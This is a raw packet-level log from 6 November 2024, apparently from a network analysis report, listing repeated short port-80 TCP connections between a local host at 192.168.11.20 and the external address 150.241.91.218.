                                                                                                                                                              Nov 6, 2024 17:35:27.205811024 CET8049777150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:27.205991983 CET4977780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:27.207376957 CET8049778150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:27.207570076 CET4977880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:27.207703114 CET4977880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:27.207703114 CET4977880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:27.396100044 CET8049778150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:27.396116018 CET8049778150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:27.464862108 CET8049778150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:27.477782011 CET4977880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:27.478298903 CET4977980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:27.666804075 CET8049778150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:27.666820049 CET8049779150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:27.667081118 CET4977880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:27.667081118 CET4977980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:27.667258024 CET4977980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:27.667258978 CET4977980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:27.855456114 CET8049779150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:27.855469942 CET8049779150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:27.927138090 CET8049779150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:27.937773943 CET4977980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:27.938235044 CET4978080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:28.125840902 CET8049780150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:28.125960112 CET8049779150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:28.126075029 CET4978080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:28.126117945 CET4977980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:28.126244068 CET4978080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:28.126244068 CET4978080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:28.313970089 CET8049780150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:28.313977957 CET8049780150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:28.384356022 CET8049780150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:28.396816969 CET4978080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:28.397274971 CET4978180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:28.584943056 CET8049780150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:28.585110903 CET8049781150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:28.585191965 CET4978080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:28.585293055 CET4978180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:28.585449934 CET4978180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:28.585449934 CET4978180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:28.773582935 CET8049781150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:28.773628950 CET8049781150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:28.838175058 CET8049781150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:28.852428913 CET4978180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:28.852809906 CET4978280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:29.042352915 CET8049782150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:29.042459011 CET8049781150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:29.042656898 CET4978180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:29.042682886 CET4978280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:29.042788029 CET4978280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:29.042788029 CET4978280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:29.230233908 CET8049782150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:29.230246067 CET8049782150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:29.298784018 CET8049782150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:29.310359955 CET4978280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:29.311016083 CET4978380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:29.498173952 CET8049782150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:29.498547077 CET4978280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:29.498696089 CET8049783150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:29.498908043 CET4978380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:29.499098063 CET4978380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:29.499098063 CET4978380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:29.686975002 CET8049783150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:29.687005043 CET8049783150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:29.754291058 CET8049783150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:29.768060923 CET4978380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:29.768563032 CET4978480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:29.956367016 CET8049783150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:29.956387997 CET8049784150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:29.956629038 CET4978380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:29.956651926 CET4978480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:29.956779957 CET4978480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:29.956779957 CET4978480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:30.144407988 CET8049784150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:30.144419909 CET8049784150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:30.211818933 CET8049784150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:30.221839905 CET4978480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:30.222398996 CET4978580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:30.409446955 CET8049784150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:30.409681082 CET4978480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:30.410173893 CET8049785150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:30.410406113 CET4978580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:30.410573006 CET4978580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:30.410631895 CET4978580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:30.598360062 CET8049785150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:30.598373890 CET8049785150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:30.667898893 CET8049785150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:30.677937984 CET4978580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:30.678392887 CET4978680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:30.866050005 CET8049785150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:30.866360903 CET4978580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:30.866473913 CET8049786150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:30.866703987 CET4978680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:30.866842031 CET4978680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:30.866842031 CET4978680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:31.055044889 CET8049786150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:31.055057049 CET8049786150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:31.123867989 CET8049786150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:31.136015892 CET4978680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:31.136451006 CET4978780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:31.323782921 CET8049787150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:31.323995113 CET4978780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:31.324098110 CET8049786150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:31.324265003 CET4978780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:31.324265003 CET4978780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:31.324364901 CET4978680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:31.511703968 CET8049787150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:31.512083054 CET8049787150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:31.584651947 CET8049787150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:31.635220051 CET4978780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:31.763459921 CET4978780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:31.764202118 CET4978880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:31.951298952 CET8049787150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:31.951582909 CET4978780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:31.952085972 CET8049788150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:31.952300072 CET4978880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:31.952459097 CET4978880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:31.952459097 CET4978880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:32.140398026 CET8049788150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:32.140407085 CET8049788150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:32.210377932 CET8049788150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:32.221976042 CET4978880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:32.222397089 CET4978980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:32.410118103 CET8049788150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:32.410243988 CET4978880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:32.410409927 CET8049789150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:32.410531998 CET4978980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:32.410669088 CET4978980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:32.410669088 CET4978980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:32.598932981 CET8049789150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:32.598942041 CET8049789150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:32.668303967 CET8049789150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:32.679897070 CET4978980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:32.680356026 CET4979080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:32.867980957 CET8049790150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:32.868020058 CET8049789150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:32.868166924 CET4978980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:32.868195057 CET4979080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:32.868283987 CET4979080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:32.868283987 CET4979080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:33.055751085 CET8049790150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:33.055761099 CET8049790150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:33.120132923 CET8049790150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:33.130362988 CET4979080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:33.131031990 CET4979180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:33.318052053 CET8049790150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:33.318602085 CET4979080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:33.318842888 CET8049791150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:33.319200993 CET4979180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:33.319253922 CET4979180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:33.319253922 CET4979180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:33.507018089 CET8049791150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:33.507034063 CET8049791150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:34.589271069 CET8049791150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:34.610546112 CET4979180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:34.611040115 CET4979280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:34.798808098 CET8049791150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:34.798825026 CET8049792150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:34.799025059 CET4979180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:34.799046040 CET4979280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:34.799185991 CET4979280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:34.799185991 CET4979280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:34.986957073 CET8049792150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:34.987062931 CET8049792150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:36.062391043 CET8049792150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:36.080687046 CET4979280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:36.081546068 CET4979380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:36.268553972 CET8049792150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:36.268757105 CET4979280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:36.269500971 CET8049793150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:36.269706011 CET4979380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:36.269884109 CET4979380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:36.269884109 CET4979380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:36.457802057 CET8049793150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:36.457818031 CET8049793150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:36.527111053 CET8049793150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:36.547138929 CET4979380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:36.547853947 CET4979480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:36.734904051 CET8049793150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:36.735260010 CET4979380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:36.735375881 CET8049794150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:36.735658884 CET4979480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:36.735793114 CET4979480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:36.735793114 CET4979480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:36.923715115 CET8049794150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:36.923757076 CET8049794150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:36.994817972 CET8049794150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:37.029728889 CET4979480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:37.031563997 CET4979580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:37.217963934 CET8049794150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:37.218216896 CET4979480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:37.219659090 CET8049795150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:37.219880104 CET4979580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:37.220001936 CET4979580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:37.220001936 CET4979580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:37.408243895 CET8049795150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:37.408288956 CET8049795150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:37.476864100 CET8049795150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:37.489058971 CET4979580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:37.489732981 CET4979680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:37.681516886 CET8049795150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:37.681715012 CET4979580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:37.681739092 CET8049796150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:37.681982994 CET4979680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:37.682084084 CET4979680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:37.682084084 CET4979680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:37.870100975 CET8049796150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:37.870110035 CET8049796150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:37.938829899 CET8049796150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:37.949244976 CET4979680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:37.949702978 CET4979780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:38.142389059 CET8049796150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:38.142398119 CET8049797150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:38.142623901 CET4979680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:38.142638922 CET4979780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:38.142812014 CET4979780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:38.142812014 CET4979780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:38.330761909 CET8049797150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:38.330774069 CET8049797150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:38.900866032 CET8049797150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:38.911714077 CET4979780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:38.912113905 CET4979880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:39.108453989 CET8049797150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:39.108469963 CET8049798150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:39.108764887 CET4979880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:39.108767033 CET4979780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:39.108850002 CET4979880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:39.108850956 CET4979880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:39.305846930 CET8049798150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:39.305891037 CET8049798150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:39.368335962 CET8049798150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:39.379494905 CET4979880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:39.379642963 CET4979980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:39.570497990 CET8049799150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:39.570539951 CET8049798150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:39.570688009 CET4979880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:39.570688963 CET4979980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:39.570897102 CET4979980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:39.570898056 CET4979980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:39.762671947 CET8049799150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:39.762712955 CET8049799150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:39.840046883 CET8049799150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:39.855254889 CET4979980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:39.855669022 CET4980080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:40.051009893 CET8049799150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:40.051062107 CET8049800150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:40.051203966 CET4979980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:40.051318884 CET4980080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:40.051405907 CET4980080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:40.051405907 CET4980080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:40.239202976 CET8049800150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:40.239217997 CET8049800150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:40.312019110 CET8049800150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:40.328298092 CET4980080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:40.328953981 CET4980180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:40.518150091 CET8049800150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:40.518328905 CET4980080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:40.518450975 CET8049801150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:40.518640995 CET4980180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:40.518791914 CET4980180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:40.518791914 CET4980180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:40.707509041 CET8049801150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:40.707520008 CET8049801150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:40.781490088 CET8049801150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:40.792695999 CET4980180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:40.793128014 CET4980280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:40.996789932 CET8049801150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:40.996823072 CET8049802150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:40.996990919 CET4980180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:40.997087955 CET4980280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:40.997145891 CET4980280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:40.997145891 CET4980280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:41.195390940 CET8049802150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:41.195404053 CET8049802150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:41.265997887 CET8049802150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:41.278783083 CET4980280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:41.278999090 CET4980380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:41.468575001 CET8049803150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:41.468585968 CET8049802150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:41.468765020 CET4980280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:41.468786001 CET4980380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:41.468898058 CET4980380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:41.468898058 CET4980380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:41.669563055 CET8049803150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:41.669615984 CET8049803150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:41.736274004 CET8049803150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:41.747319937 CET4980380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:41.747816086 CET4980480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:41.945118904 CET8049803150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:41.945173979 CET8049804150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:41.945297003 CET4980380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:41.945394039 CET4980480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:41.945553064 CET4980480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:41.945553064 CET4980480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:42.137082100 CET8049804150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:42.137092113 CET8049804150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:42.203222990 CET8049804150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:42.214910030 CET4980480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:42.215440035 CET4980580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:35:42.411104918 CET8049805150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:35:42.411125898 CET8049804150.241.91.218192.168.11.20
